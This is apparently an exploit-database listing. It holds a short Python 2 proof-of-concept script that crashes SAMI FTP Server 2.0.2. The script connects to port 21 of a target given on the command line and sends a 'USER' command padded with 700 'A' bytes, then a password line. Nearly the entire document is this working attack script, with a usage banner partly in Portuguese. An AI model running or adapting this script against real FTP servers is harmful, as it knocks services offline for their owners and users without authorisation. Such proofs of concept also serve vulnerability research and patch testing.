Share
## https://sploitus.com/exploit?id=PACKETSTORM:163009
#!/usr/bin/python  
#  
# e-mail: fernando.mengalli@gmail.com  
#  
# Date: 06/08/2021 - 08 jun  
#  
# Version Vulnerable: SAMI FTP Server 2.0.2  
#  
# OS Tested: Windows XP PACK 3 Brazilian e Windows 2000  
#  
  
import socket  
import sys  
  
if len(sys.argv) != 2:  
print  
"#####################################################################"  
print "#  
#"  
print "# SAMI FTP Server 2.0.2 - Command 'USER' Denied of Service  
#"  
print "#  
#"  
print "# Author: Fernando Mengali  
#"  
print "#  
#"  
print "# Modo de uso: exploit.py <IP>  
#"  
print "#  
#"  
print  
"#####################################################################"  
sys.exit(1)  
  
target = sys.argv[1]  
  
payload = "\x41"*700  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
connect = s.connect((target, 21))  
print "[+] Conectado com sucesso"  
except:  
print "[-] Falha ao conectar para o servidor..."  
sys.exit(0)  
s.recv(1024)  
print "[+] Enviando pacote crafted..."  
s.send('USER '+payload+' \r\n')  
s.recv(1024)  
s.send('PASS anonymous \r\n')  
s.close()